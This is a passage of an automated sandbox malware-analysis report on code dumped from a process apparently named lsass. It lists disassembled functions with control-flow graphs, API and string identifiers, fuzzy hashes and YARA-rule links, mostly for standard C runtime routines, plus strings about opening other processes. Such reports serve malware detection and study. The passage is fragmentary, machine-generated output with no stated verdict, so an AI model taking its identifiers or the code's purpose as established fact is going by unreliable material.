140adfc7cbd-140adfc7ccd 1048->1052 1053 140adfc7cba 1048->1053 1055 140adfc7dbc-140adfc7dbf 1049->1055 1056 140adfc7d8c-140adfc7db9 1049->1056 1050->1049 1052->1045 1052->1047 1053->1052 1054->1039 1057 140adfc7cea 1054->1057 1058 140adfc7dc7-140adfc7df3 1055->1058 1059 140adfc7dc1-140adfc7dc5 1055->1059 1056->1055 1060 140adfc7cee-140adfc7cf7 1057->1060 1061 140adfc7df6-140adfc7df9 1058->1061 1059->1058 1059->1061 1064 140adfc7cf9-140adfc7cff 1060->1064 1065 140adfc7d01-140adfc7d04 1060->1065 1062 140adfc7dfb-140adfc7dff 1061->1062 1063 140adfc7e01-140adfc7e2a 1061->1063 1062->1063 1066 140adfc7e2d-140adfc7e33 1062->1066 1063->1066 1064->1060 1067 140adfc7d19 1065->1067 1068 140adfc7d06-140adfc7d0a 1065->1068 1066->1041 1067->1039 1069 140adfc7d0c-140adfc7d0f 1068->1069 1070 140adfc7d11 1068->1070 1071 140adfc7d15-140adfc7d17 1069->1071 1070->1071 1071->1039
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.3348718884.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_140adfc0000_lsass.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                              • String ID: gfffffff
                                                                                                              • API String ID: 3215553584-1523873471
                                                                                                              • Opcode ID: caa4a8a41497ffe82b5b0fa0bcb66fb6e589835bb099227987a6e57e44845178
                                                                                                              • Instruction ID: 485a7e7d6711d32f3d8944ce97608632e9dab7a2165fab70ab5cd241bbb13a72
                                                                                                              • Opcode Fuzzy Hash: caa4a8a41497ffe82b5b0fa0bcb66fb6e589835bb099227987a6e57e44845178
                                                                                                              • Instruction Fuzzy Hash: CD9124737157C987EB16CB26E4003EE77A7AB58BC4F258022CB59473A5EA39C517E301
                                                                                                              Function 00000140ADFC8F84 Relevance: 1.6, APIs: 1, Instructions: 146COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.3348718884.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_140adfc0000_lsass.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: eedf6195b07e75503f7ef64eaadaade89bfce7268fedf9e5281d300d5d643694
                                                                                                              • Instruction ID: 34c72ff10ec4b96bca838921b36f9e884905769864e9bd736e421a716fda2a1c
                                                                                                              • Opcode Fuzzy Hash: eedf6195b07e75503f7ef64eaadaade89bfce7268fedf9e5281d300d5d643694
                                                                                                              • Instruction Fuzzy Hash: EE51D1327247949AF7218B77A9003DF7BA7BB49BD8F244214AF9847BA5CB38C552D700
                                                                                                              Function 00000140ADFD0470 Relevance: .0, Instructions: 32COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.3348718884.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_140adfc0000_lsass.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f5203cd92e734575f79167aed4563d6f1df4752d5705fd897fb0d44aadde9f5b
                                                                                                              • Instruction ID: fc8b68289c36e3eeff4c960dcbe6f4b96bb4bacc7425a59055c6b5233f733184
                                                                                                              • Opcode Fuzzy Hash: f5203cd92e734575f79167aed4563d6f1df4752d5705fd897fb0d44aadde9f5b
                                                                                                              • Instruction Fuzzy Hash: 3AF062717153948BDBA58F29A80275A77E3FB0C384F908429E6C983B64D23C8061AF44
                                                                                                              Function 00000140ADFD2188 Relevance: .0, Instructions: 13COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.3348718884.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_140adfc0000_lsass.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 72c30af276ceb9d04587f3c8f33b1f96cfcd9a34781d576eee18766bdf06db1e
                                                                                                              • Instruction ID: 797370bfb6938aaf9b79aa84a5a9fb9390bb6ceaa0e0813607f69cf711b3b758
                                                                                                              • Opcode Fuzzy Hash: 72c30af276ceb9d04587f3c8f33b1f96cfcd9a34781d576eee18766bdf06db1e
                                                                                                              • Instruction Fuzzy Hash: D0D012AB55EBC037F1D342290E663992FC3BF56B6CF2C834D8BB0071D2523208079245
                                                                                                              Function 00000140ADFC138C Relevance: 19.7, APIs: 13, Instructions: 235COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 473 140adfc138c-140adfc1392 474 140adfc13cd-140adfc13d7 473->474 475 140adfc1394-140adfc1397 473->475 478 140adfc14f8-140adfc1514 474->478 476 140adfc1399-140adfc139c 475->476 477 140adfc13c1-140adfc1400 call 140adfc1954 475->477 479 140adfc139e-140adfc13a1 476->479 480 140adfc13b4 __scrt_dllmain_crt_thread_attach 476->480 493 140adfc141a-140adfc142f call 140adfc17e8 477->493 494 140adfc1402 477->494 481 140adfc1528-140adfc1543 call 140adfc17e8 478->481 482 140adfc1516 478->482 484 140adfc13ad-140adfc13b2 call 140adfc1898 479->484 485 140adfc13a3-140adfc13ac 479->485 488 140adfc13b9-140adfc13c0 480->488 496 140adfc157a-140adfc15ac call 140adfc1b74 481->496 497 140adfc1545-140adfc1578 call 140adfc1910 call 140adfc17b8 call 140adfc1cfc call 140adfc1940 call 140adfc1b14 call 140adfc1b38 481->497 486 140adfc1518-140adfc1527 482->486 484->488 505 140adfc14e9-140adfc14f7 call 140adfc1b74 493->505 506 140adfc1435-140adfc1446 call 140adfc1858 493->506 498 140adfc1404-140adfc1419 494->498 507 140adfc15bd-140adfc15c3 496->507 508 140adfc15ae-140adfc15b4 496->508 497->486 505->478 527 140adfc1448-140adfc146c call 140adfc1cc0 call 140adfc17a8 call 140adfc17cc call 140adfc481c 506->527 528 140adfc1497-140adfc14a1 call 140adfc1b14 506->528 513 140adfc160a-140adfc1620 call 140adfc1310 507->513 514 140adfc15c5-140adfc15cf 507->514 508->507 512 140adfc15b6-140adfc15b8 508->512 520 140adfc16ad-140adfc16ba 512->520 533 140adfc165a-140adfc165c 513->533 534 140adfc1622-140adfc1624 513->534 521 140adfc15db-140adfc15e9 call 140adfd2258 514->521 522 140adfc15d1-140adfc15d9 514->522 523 140adfc15ef-140adfc1604 call 140adfc138c 521->523 539 140adfc16a3-140adfc16ab 521->539 522->523 523->513 523->539 527->528 575 140adfc146e-140adfc1475 __scrt_dllmain_after_initialize_c 527->575 528->494 546 140adfc14a7-140adfc14b3 call 140adfc1b64 528->546 536 140adfc165e-140adfc1661 533->536 537 140adfc1663-140adfc1678 call 140adfc138c 533->537 534->533 542 140adfc1626-140adfc164a call 140adfc1310 call 140adfc138c 534->542 536->537 536->539 537->539 555 140adfc167a-140adfc1684 537->555 539->520 542->533 570 140adfc164c-140adfc1654 call 140adfd2258 542->570 563 140adfc14d9-140adfc14e4 546->563 564 140adfc14b5-140adfc14bf call 140adfc1a78 546->564 560 140adfc168f-140adfc169f call 140adfd2258 555->560 561 140adfc1686-140adfc168d 555->561 560->539 561->539 563->498 564->563 576 140adfc14c1-140adfc14cf 564->576 570->533 575->528 577 140adfc1477-140adfc1494 call 140adfc47b8 575->577 576->563 577->528
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.3348718884.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_140adfc0000_lsass.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Initialize__scrt_acquire_startup_lock__scrt_fastfail__scrt_release_startup_lock$__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_default_local_stdio_options__scrt_is_nonwritable_in_current_image__scrt_uninitialize_crt
                                                                                                              • String ID:
                                                                                                              • API String ID: 1988982384-0
                                                                                                              • Opcode ID: 0b6473d37e5de2f6e6d1741f9288cea7edc3785064012b50b1e1524d92f4a22c
                                                                                                              • Instruction ID: 7f2c1d08241201adfb7c4973d39bb8dd0235bcf2550be065a5b08e27a6f87a02
                                                                                                              • Opcode Fuzzy Hash: 0b6473d37e5de2f6e6d1741f9288cea7edc3785064012b50b1e1524d92f4a22c
                                                                                                              • Instruction Fuzzy Hash: 8291BD30A2074987FF52AB6794403DB3293AF8E784F748115AB49477B6DA38CDB3A700
                                                                                                              Function 00000140ADFC8398 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 104COMMONLIBRARYCODE
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 580 140adfc8398-140adfc83c4 581 140adfc83e4-140adfc83e6 580->581 582 140adfc83c6-140adfc83ca 580->582 583 140adfc83e8-140adfc83f2 581->583 584 140adfc83f6-140adfc8488 581->584 585 140adfc83cf-140adfc83e3 call 140adfd0ba0 582->585 583->584 586 140adfc848d-140adfc8495 584->586 586->586 588 140adfc8497-140adfc84b8 call 140adfc5670 586->588 588->585 592 140adfc84be-140adfc84f8 call 140adfc5d60 588->592 596 140adfc84fa-140adfc850d call 140adfc5e60 call 140adfc5d40 592->596 597 140adfc8512-140adfc8515 592->597 609 140adfc8745-140adfc875b 596->609 597->596 599 140adfc8517-140adfc851a 597->599 599->596 601 140adfc851c-140adfc8527 599->601 601->596 603 140adfc8529-140adfc8539 601->603 605 140adfc8548 603->605 606 140adfc853b-140adfc8541 603->606 608 140adfc854b-140adfc8556 605->608 606->605 607 140adfc8543-140adfc8546 606->607 607->608 610 140adfc85cc-140adfc85d9 608->610 611 140adfc8558-140adfc856d 608->611 613 140adfc870e-140adfc8740 call 140adfc7b00 610->613 614 140adfc85df-140adfc85e8 610->614 611->610 612 140adfc856f-140adfc857f 611->612 616 140adfc85ad-140adfc85c7 call 140adfc8398 612->616 617 140adfc8581-140adfc8584 612->617 613->609 618 140adfc85ee-140adfc85f1 614->618 619 140adfc86d5-140adfc870c call 140adfc7e70 614->619 616->609 621 140adfc859d-140adfc85a9 617->621 622 140adfc8586-140adfc8593 617->622 624 140adfc864b-140adfc86a4 call 140adfccb8c call 140adfcc678 618->624 625 140adfc85f3-140adfc85f6 618->625 619->609 621->616 622->621 629 140adfc8595-140adfc859b 622->629 639 140adfc86ae-140adfc86d3 call 140adfc8120 624->639 640 140adfc86a6-140adfc86a9 624->640 626 140adfc860f-140adfc8646 call 140adfc8264 625->626 627 140adfc85f8-140adfc85fb 625->627 626->609 627->613 632 140adfc8601-140adfc8604 627->632 629->616 632->619 635 140adfc860a-140adfc860d 632->635 635->624 635->626 639->609 640->609
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.3348718884.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_140adfc0000_lsass.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                              • String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
                                                                                                              • API String ID: 3215553584-2617248754
                                                                                                              • Opcode ID: ea11b76dc15e85ae5e90986785aa746ab39b77cc28c4fb9aa00a5116ba60465d
                                                                                                              • Instruction ID: b4a3c7ee2944b92e831b883943a62f391fd93177c27c0d9db1e23a63a1600681
                                                                                                              • Opcode Fuzzy Hash: ea11b76dc15e85ae5e90986785aa746ab39b77cc28c4fb9aa00a5116ba60465d
                                                                                                              • Instruction Fuzzy Hash: A9419E36710B548AE701CF26E8503CE33E7FB08788F644125EF9847BA8EA38C526D340
                                                                                                              Function 00000140ADFC12B8 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 24COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.3348718884.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_140adfc0000_lsass.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Processwprintf$ErrorLastOpenTerminate
                                                                                                              • String ID: ERROR:error no is :%d$openprocess failed...
                                                                                                              • API String ID: 1343626970-3419103911
                                                                                                              • Opcode ID: fb04a702b352934bfb24a0038739b3ecd274cc920e2fc26e3ad7404113707b54
                                                                                                              • Instruction ID: e084710364dd71c0cb66ae3032b6907e0dcf54b6dc4e00167b79ca2624c7402a
                                                                                                              • Opcode Fuzzy Hash: fb04a702b352934bfb24a0038739b3ecd274cc920e2fc26e3ad7404113707b54
                                                                                                              • Instruction Fuzzy Hash: FEF01231711B0443FB57972398443D731936F9C709FB441248A4A832B4EE3489B7B240
                                                                                                              Function 00000140ADFCFDC4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMONLIBRARYCODE
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.3348718884.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_140adfc0000_lsass.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                              • String ID: CONOUT$
                                                                                                              • API String ID: 3230265001-3130406586
                                                                                                              • Opcode ID: 913781285adf38d8b4229c6d5fc6a6834cdbe5f6ec22c189a15ee890de81af83
                                                                                                              • Instruction ID: f41df36ce56894eae6fbe6044e64e41d9f6fa8a455f9b52abad17a5ddd81c7f3
                                                                                                              • Opcode Fuzzy Hash: 913781285adf38d8b4229c6d5fc6a6834cdbe5f6ec22c189a15ee890de81af83
                                                                                                              • Instruction Fuzzy Hash: 36118131210B4483E7518B53E85435AB2A3FB8CBE8F644214EB99877B8CB38C5569740
                                                                                                              Function 00000140ADFC4C70 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.3348718884.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_140adfc0000_lsass.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                                              • API String ID: 4061214504-1276376045
                                                                                                              • Opcode ID: 16d129b887caba687a4f49f846cfe76f8213c1e964bf524bc6523eeb77cca99a
                                                                                                              • Instruction ID: 2adb31ba1d3a99ba6a320f15d537632a8910ad8a2c1773db0de04bfbafcc5e77
                                                                                                              • Opcode Fuzzy Hash: 16d129b887caba687a4f49f846cfe76f8213c1e964bf524bc6523eeb77cca99a
                                                                                                              • Instruction Fuzzy Hash: 57F0547172174493EB469F12D48439A3363AF4C758F5450159B8747674CF38C49AD740
                                                                                                              Function 00000140ADFCB604 Relevance: 7.7, APIs: 5, Instructions: 203COMMONLIBRARYCODE
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 779 140adfcb604-140adfcb627 780 140adfcb62d-140adfcb630 779->780 781 140adfcb8c4 779->781 782 140adfcb652-140adfcb678 780->782 783 140adfcb632-140adfcb64d call 140adfc5e40 call 140adfc5e60 call 140adfc5d40 780->783 784 140adfcb8c6-140adfcb8dd 781->784 786 140adfcb67a-140adfcb681 782->786 787 140adfcb683-140adfcb689 782->787 783->784 786->783 786->787 788 140adfcb699-140adfcb6a9 call 140adfce090 787->788 789 140adfcb68b-140adfcb694 call 140adfcf374 787->789 796 140adfcb6af-140adfcb6bf 788->796 797 140adfcb7b2-140adfcb7c2 788->797 789->788 796->797 801 140adfcb6c5-140adfcb6d8 call 140adfc77f0 796->801 799 140adfcb7c4-140adfcb7cb 797->799 800 140adfcb813-140adfcb838 call 140adfd21f0 797->800 803 140adfcb7cd-140adfcb7d0 799->803 804 140adfcb7ff-140adfcb811 call 140adfcb188 799->804 812 140adfcb83a-140adfcb840 call 140adfd2008 800->812 813 140adfcb843 800->813 817 140adfcb6da-140adfcb6ea 801->817 818 140adfcb6f0-140adfcb70c GetConsoleMode 801->818 808 140adfcb7eb-140adfcb7fd call 140adfcb3a8 803->808 809 140adfcb7d2-140adfcb7d5 803->809 827 140adfcb7a6-140adfcb7ad 804->827 808->827 814 140adfcb7d7-140adfcb7e9 call 140adfcb28c 809->814 815 140adfcb850-140adfcb85a 809->815 812->813 821 140adfcb846 813->821 814->827 823 140adfcb85c-140adfcb861 815->823 824 140adfcb8bd-140adfcb8c2 815->824 817->797 817->818 818->797 826 140adfcb712-140adfcb715 818->826 828 140adfcb84b 821->828 831 140adfcb88d-140adfcb89e 823->831 832 140adfcb863-140adfcb866 823->832 824->784 833 140adfcb794-140adfcb7a1 call 140adfcacac 826->833 834 140adfcb717-140adfcb71e 826->834 827->828 828->815 835 140adfcb8a5-140adfcb8b5 call 140adfc5e60 call 140adfc5e40 831->835 836 140adfcb8a0-140adfcb8a3 831->836 837 140adfcb868-140adfcb878 call 140adfc5e60 call 140adfc5e40 832->837 838 140adfcb883-140adfcb888 call 140adfc5df0 832->838 833->827 834->815 839 140adfcb724-140adfcb734 834->839 835->824 836->781 836->835 837->838 838->831 844 140adfcb78d-140adfcb78f 839->844 845 140adfcb736 839->845 844->821 846 140adfcb739-140adfcb750 call 140adfcf37c 845->846 856 140adfcb784-140adfcb78a call 140adfd2008 846->856 857 140adfcb752-140adfcb75c 846->857 856->844 858 140adfcb75e-140adfcb770 call 140adfcf37c 857->858 859 140adfcb779-140adfcb780 857->859 858->856 865 140adfcb772-140adfcb777 858->865 859->844 862 140adfcb782 859->862 862->846 865->859
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.3348718884.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_140adfc0000_lsass.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                                                                                                              • String ID:
                                                                                                              • API String ID: 2210144848-0
                                                                                                              • Opcode ID: 0aa645aeeb634e79f4747d2c1e5fe33c76d88011438f1f6af14576989577eca1
                                                                                                              • Instruction ID: e0b4b6b4ee3f6a0fbcccb929156e489834919fed141868cb47d8868d321161c8
                                                                                                              • Opcode Fuzzy Hash: 0aa645aeeb634e79f4747d2c1e5fe33c76d88011438f1f6af14576989577eca1
                                                                                                              • Instruction Fuzzy Hash: 7381BC3A6207188BF7629B6794883EE3663FF4CB88F644115DF0A137E5DA348467A710
                                                                                                              Function 00000140ADFD0270 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.3348718884.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_140adfc0000_lsass.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _set_statfp
                                                                                                              • String ID:
                                                                                                              • API String ID: 1156100317-0
                                                                                                              • Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                              • Instruction ID: 6c807da701675cfe1835e1e6f58747cb5b7cd97ce68a1a2e654248f864b6c262
                                                                                                              • Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                              • Instruction Fuzzy Hash: 1D11A372A51B4607F666116BE4563EB34436F5C3BEF350724AFE60B6FE8A7488837104
                                                                                                              Function 00000140ADFC3724 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 151COMMONLIBRARYCODE
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 893 140adfc3724-140adfc3743 894 140adfc3745-140adfc3750 call 140adfc5e60 call 140adfc5d40 893->894 895 140adfc3767-140adfc376e call 140adfc4474 893->895 901 140adfc3755 894->901 895->901 902 140adfc3770-140adfc3775 895->902 903 140adfc3757-140adfc3766 901->903 904 140adfc378c-140adfc3799 902->904 905 140adfc3777-140adfc378a call 140adfc5e60 call 140adfc5d40 902->905 907 140adfc379f 904->907 908 140adfc3932-140adfc3935 904->908 905->903 910 140adfc37a6-140adfc37ae 907->910 908->903 911 140adfc390a-140adfc3915 910->911 914 140adfc391b 911->914 915 140adfc37b3-140adfc37bb 911->915 916 140adfc391f-140adfc392c 914->916 915->916 917 140adfc37c1-140adfc37cc 915->917 916->908 916->910 918 140adfc37ce-140adfc37dd 917->918 919 140adfc37df 917->919 920 140adfc37e1-140adfc37f3 918->920 919->920 920->894 921 140adfc37f9-140adfc37fb 920->921 922 140adfc38fa-140adfc38fd call 140adfc393c 921->922 923 140adfc3801-140adfc3804 921->923 929 140adfc3902-140adfc3904 922->929 924 140adfc380a-140adfc380d 923->924 925 140adfc38e1-140adfc38f8 923->925 927 140adfc38ac-140adfc38b1 924->927 928 140adfc3813-140adfc3816 924->928 925->911 930 140adfc38db-140adfc38df 927->930 931 140adfc38b3-140adfc38b5 927->931 932 140adfc3818-140adfc381b 928->932 933 140adfc3880-140adfc3884 928->933 929->901 929->911 930->911 934 140adfc38d5-140adfc38d9 931->934 935 140adfc38b7-140adfc38b9 931->935 936 140adfc381d-140adfc3820 932->936 937 140adfc3877-140adfc387b 932->937 938 140adfc388c-140adfc389d 933->938 939 140adfc3886-140adfc388a 933->939 934->911 940 140adfc38cf-140adfc38d3 935->940 941 140adfc38bb-140adfc38bd 935->941 942 140adfc384a-140adfc384e 936->942 943 140adfc3822-140adfc3825 936->943 937->911 945 140adfc389f-140adfc38a5 938->945 946 140adfc38a8-140adfc38aa 938->946 944 140adfc3854-140adfc385c call 140adfc3680 939->944 940->911 947 140adfc38bf-140adfc38c1 941->947 948 140adfc38c9-140adfc38cd 941->948 949 140adfc3850 942->949 950 140adfc3861-140adfc3875 942->950 952 140adfc383d-140adfc3845 call 140adfc3a50 943->952 953 140adfc3827-140adfc382a 943->953 944->929 945->946 946->929 947->911 955 140adfc38c3-140adfc38c7 947->955 948->911 949->944 950->946 952->929 953->901 957 140adfc3830-140adfc3838 call 140adfc3bc4 953->957 955->911 957->929
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.3348718884.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_140adfc0000_lsass.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                              • String ID: $*
                                                                                                              • API String ID: 3215553584-3982473090
                                                                                                              • Opcode ID: a6d38b0082aa0a66bdf3457a030c53fd1f64bdea90d598c7255dcf565db40810
                                                                                                              • Instruction ID: 7f97536e1277082bef201b86e5aaf8f8118a348225da5a3674e4afee1c3f4b9d
                                                                                                              • Opcode Fuzzy Hash: a6d38b0082aa0a66bdf3457a030c53fd1f64bdea90d598c7255dcf565db40810
                                                                                                              • Instruction Fuzzy Hash: 5F61637322434887E76A8F2690553AF3BE3EB0DB98F341115CF46476E9C734C466A741
                                                                                                              Function 00000140ADFC7F4C Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 134COMMONLIBRARYCODE
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.3348718884.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_140adfc0000_lsass.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                              • String ID: -$e+000$gfff
                                                                                                              • API String ID: 3215553584-2620144452
                                                                                                              • Opcode ID: b36fcc511ed639febc8617f931b73cbb3dfed337ad52bd8f99b52793d8ed6159
                                                                                                              • Instruction ID: 44a48c9981b1e05bbe9e2d157db87febc40c9d57d627afebfbade9ad2f48ab74
                                                                                                              • Opcode Fuzzy Hash: b36fcc511ed639febc8617f931b73cbb3dfed337ad52bd8f99b52793d8ed6159
                                                                                                              • Instruction Fuzzy Hash: 285108727247C887E7668F3AD8413CA7B93EB84B90F5C9221CB944BBE5CA39C456D700
                                                                                                              Function 00000140ADFC6274 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21COMMONLIBRARYCODE
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 1002 140adfc6274-140adfc62aa call 140adfc5f38 1005 140adfc62ac-140adfc62b2 call 140adfd2258 1002->1005 1006 140adfc62b4 call 140adfd2118 1002->1006 1010 140adfc62ba-140adfc62c4 1005->1010 1006->1010
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.3348718884.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_140adfc0000_lsass.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Valuetry_get_function
                                                                                                              • String ID: ERROR:error no is :%d$FlsSetValue
                                                                                                              • API String ID: 738293619-907136408
                                                                                                              • Opcode ID: 260fe3b1804f72f4a10bf823fe0ff6abdffd4cc23a2d2d7020f7e243c0506e86
                                                                                                              • Instruction ID: bf77cd5551fa96b0456b85a9dc6e4fa629855707be503abb46cd32f8a959f6be
                                                                                                              • Opcode Fuzzy Hash: 260fe3b1804f72f4a10bf823fe0ff6abdffd4cc23a2d2d7020f7e243c0506e86
                                                                                                              • Instruction Fuzzy Hash: 5DE0397161574493FB0A4B52E8402DA3273AF8C788FA88022AF96073B4CE38C896A251
                                                                                                              Function 00000140ADFCB3A8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.3348718884.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_140adfc0000_lsass.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ErrorFileLastWrite
                                                                                                              • String ID: U
                                                                                                              • API String ID: 442123175-4171548499
                                                                                                              • Opcode ID: 7193055222a06152960c3edf59cb11cd12c9819c05e9034f4b9399f865831105
                                                                                                              • Instruction ID: f0601a2d4bd3a10198b0e194f475aa79e0c6681d0dd6374e601bf1cbd9245908
                                                                                                              • Opcode Fuzzy Hash: 7193055222a06152960c3edf59cb11cd12c9819c05e9034f4b9399f865831105
                                                                                                              • Instruction Fuzzy Hash: 1241A432628B8486DB218F26E4443EA7767FB88794F544021EF8D877A8DB38C556D740
                                                                                                              Function 00000140ADFC632C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.3348718884.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_140adfc0000_lsass.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Stringtry_get_function
                                                                                                              • String ID: LCMapStringEx
                                                                                                              • API String ID: 2588686239-3893581201
